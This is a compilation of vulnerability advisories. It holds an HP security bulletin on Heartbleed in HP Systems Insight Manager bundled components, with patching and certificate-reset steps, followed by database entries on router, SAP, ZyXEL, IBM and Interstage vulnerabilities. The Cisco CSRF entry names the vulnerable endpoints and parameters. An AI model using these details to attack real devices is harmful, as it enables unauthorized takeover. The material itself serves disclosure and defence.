as suggested in Rename to. Third, copy the component to the location
suggested in Component Copy Location.
Table Row 1
  Download Link:           http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52
  Rename to:               smhx86-cp023242.exe
  Component Copy Location: \\express\hpfeatures\hpagents-ws\components\Win2003
Table Row 2
  Download Link:           http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37
  Rename to:               smhamd64-cp023243.exe
  Component Copy Location: \\express\hpfeatures\hpagents-ws\components\Win2003
Table Row 3
  Download Link:           http://www.hp.com/swpublishing/MTX-37075daeead2433cb41b59ae76
  Rename to:               smhamd64-cp023341.exe
  Component Copy Location: \\express\hpfeatures\hpagents-ws\components\Win2008
Table Row 4
  Download Link:           http://www.hp.com/swpublishing/MTX-27e03b2f9cd24e77adc9dba94a
  Rename to:               smhx86-cp023340.exe
  Component Copy Location: \\express\hpfeatures\hpagents-ws\components\Win2008
Table Row 5
  Download Link:           http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37
  Rename to:               Do not rename the downloaded component for this step.
  Component Copy Location: \\express\hpfeatures\hpagents-sles11-x64\components
                           \\express\hpfeatures\hpagents-sles10-x64\components
                           \\express\hpfeatures\hpagents-rhel5-x64\components
                           \\express\hpfeatures\hpagents-rhel6-x64\components
Initiate Install HP Management Agents for SLES 11 x64 on targets running
SLES11 x64.
Initiate Install HP Management Agents for SLES 10 x64 on targets running
SLES10 x64.
Initiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL
6 x64.
Initiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL
5 x64.
Initiate Install HP Management Agents for Windows x86/x64 on targets running
Windows.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04263236
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04263236
Version: 2
HPSBMU03022 rev.2 - HP Systems Insight Manager (SIM) Bundled Software running
OpenSSL, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-04-25
Last Updated: 2014-05-13
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Systems
Insight Manager (SIM) bundled software running OpenSSL. This is the
OpenSSL vulnerability known as "Heartbleed", which could be exploited remotely
resulting in disclosure of information.
The HP SIM software itself is not vulnerable to CVE-2014-0160 ("Heartbleed").
However, the software components bundled with HP SIM are impacted and should
be addressed if installed.
References: CVE-2014-0160, SSRT101527
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Systems Insight Manager 7.2, 7.2.1, 7.2.2, 7.3, and 7.3.1 bundled with the
following software:
HP Smart Update Manager (SUM) 6.0.0 through 6.3.0
HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,
v7.3.1 for Linux and Windows
WMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1
HP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for
Windows
HP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux
HP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,
and v7.3.1 for Windows
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has addressed this vulnerability for the impacted software components
bundled with HP Systems Insight Manager (SIM) in the following HP Security
Bulletins:
HP SIM Component                                      HP Security Bulletin
  Security Bulletin Location
HP Smart Update Manager (SUM)                         HPSBMU02997
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239375
HP System Management Homepage (SMH)                   HPSBMU02998
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239372
WMI Mapper for HP Systems Insight Manager             HPSBMU03013
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04260385
HP Version Control Agent (VCA) and Version Control    HPSBMU03020
Repository Manager (VCRM) on Linux and Windows
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04262472
Note: If customers believe that the SIM installation was compromised while it
was running components vulnerable to Heartbleed they need to take the
following actions once they have upgraded to the non-vulnerable components.
This includes revoking, recreating, and re-importing certificates and
resetting passwords that might have been harvested by a malicious attacker
using the Heartbleed vulnerability.
HP has made the following hot fixes available for SIM v7.2.x that fix the
Heartbleed vulnerability: The HP SIM 7.2 Hotfix Kit is available in the
following location and is applicable to HP SIM 7.2.x installations. Please
read through the readme.txt file before proceeding with the installation.
Please click on the HP SIM 7.2 HotFix Kit link to download the hot fix for
your operating system platform:
http://h18013.www1.hp.com/products/servers/management/hpsim/download.html
After installing the SIM72_hotfix_2014_Apr_win.exe hotfix, HP System Management
Homepage has to be manually upgraded if it is already installed on the CMS.
The HP SMH installers for 32-bit and 64-bit can be found on the CMS under the
location SIM_INSTALL_DIR\smartcomponents. The installer filenames are
cp023242.exe and cp023243.exe.
In case it is suspected that the infrastructure has been compromised, the
user needs to create a new HP SIM server certificate and new Single Sign-on
(sso) certificates. To create new server and sso certificates, refer to the
HP SIM 7.2 Command Line Interface guide, which can be found at the URL below:
http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/index
Refer to the mxcert command section, which has the details to create new
server and sso certificates.
Once the new server certificate is created, it will invalidate any trust
relationship between the CMS and any other system that depends on this
certificate, such as browsers. The user must re-establish the trust between
the CMS and other systems that use this certificate, and revoke any previous
SIM certificates from any device previously configured to trust SIM (Onboard
Administrator, Virtual Connect Module, iLOs, and SMH instances).
Once the new sso certificate is created, the user must re-establish the trust
between HP SIM and managed devices (HP SMH, iLO, OA, VC) for Single Sign-on
to work. To re-establish trust with the sso certificate, refer to the HP SIM
7.2 user guide and HP SIM Online help (under the security section). The HP SIM
7.2 user guide is located at the URL below:
http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-c03651392-3.pdf
The HP SIM 7.3 user guide is located at the URL below:
http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-c04030739-2.pdf
CMS Reconfigure Tool (aka mxrefconfig)
In case it is suspected that CMS OS credentials are also compromised, it
is recommended that the credentials be changed. The SIM User Guide (Chapter 19
CMS Reconfigure Tool, pg 93) provides two procedures to change the service
account password along with other related accounts. The procedures to follow
are:
Procedure 18 - Changing the CMS password for HP SIM and Insight Control
Procedure 19 - Changing CMS password for Matrix OE and Operations
Orchestration
Note: If the customer has Insight Control server deployment installed, the
procedures to change the password are documented in the HP Insight Control
Server Deployment User Guide.
Frequently Asked Questions:
Will updated systems require a reboot after applying the SIM hotfix?
No, reboot of the system will not be required. Installing the new build would
be sufficient to get back to the normal state.
Will new certificates be issued along with the patch, or need to be handled
separately?
If you suspect the certificate has been compromised due to this
vulnerability, we do recommend creating new certificates for the server and
Single Sign-on and revoking the previous certificates. Instructions on creating
new certificates and re-establishing trust between the CMS and managed devices
are in the notes above.
From where can I get HP SIM documentation?
All major documents are available at:
http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/index.aspx?cat=insightmanagement&subcat=sim#.U2yioSi20tM
HISTORY
Version:1 (rev.1) - 25 April 2014 Initial release
Version:2 (rev.2) - 13 May 2014 Added additional remediation steps and v7.2
Hotfix
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
| VAR-201312-0304 | CVE-2013-7043 | Cisco Scientific Atlanta DPR2320 Cross-site request forgery vulnerability in router software |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity; (2) reboot the device via the Restart parameter to goform/restart; (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity; or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic. The Cisco DPR2320R2 is a wireless router product from Cisco (United States).
A cross-site request forgery vulnerability exists in the Cisco DPR2320R2 wireless router running firmware version 2.0.2r1262-090417. A remote attacker could use this vulnerability to perform administrator actions and take control of the affected device. The Cisco Scientific Atlanta DPR2320R2 is a cable modem gateway device from Cisco. The device combines a cable modem, a router and a wireless access point, enabling multiple PCs, notebooks or other network devices to share broadband access.
| VAR-201311-0241 | CVE-2013-6918 | Satechi Smart Travel Router Web Management Console Remote Authentication Bypass Vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The web interface on the Satechi travel router 1.5, when Wi-Fi is used for WAN access, exposes the console without authentication on the WAN IP address regardless of the "Web Management via WAN" setting, which allows remote attackers to bypass intended access restrictions via HTTP requests. The Satechi Smart Travel Router is a wireless router device. A remote attacker can bypass the device's access restrictions by submitting an HTTP request. The Satechi Travel Router is a portable router product of the American company Satechi that includes standard international plug adapters, USB chargers and a WiFi (802.11b/g/n) router.
| VAR-201312-0311 | CVE-2013-7094 | SAP NetWeaver RSDDCVER_COUNT_TAB_COLS function SQL injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver "RSDDCVER_COUNT_TAB_COLS" function fails to properly filter user-submitted input, allowing remote attackers to submit crafted SQL queries that can retrieve or manipulate database information. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SAP NetWeaver 7.30 is vulnerable; other versions may also be affected.
| VAR-201311-0517 | No CVE | ZyXEL GS1510-16 'webctrl.cgi' Remote Password Disclosure Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
ZyXEL GS1510-16 is prone to a password-disclosure vulnerability.
Attackers can exploit this issue to gain access to the administrator password, which may lead to further attacks.
| VAR-201312-0461 | CVE-2013-6718 | IBM BladeCenter Advanced Management Module firmware account name and password disclosure vulnerability |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
The Advanced Management Module (AMM) with firmware 3.64B, 3.64C, and 3.64G for IBM BladeCenter systems allows remote attackers to discover account names and passwords via use of an unspecified interface.
Little is known about this issue or its effects at this time. We will update this BID as more information emerges.
| VAR-201311-0401 | No CVE | Interstage Application Server/Studio Log Feature Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Interstage Application Server is an application platform that supports building and running business systems. The Interstage Application Server/Studio logging feature (ihsrlog/rotatelogs) has an unspecified error that allows a remote attacker to trigger a buffer overflow and execute arbitrary code in the context of the application.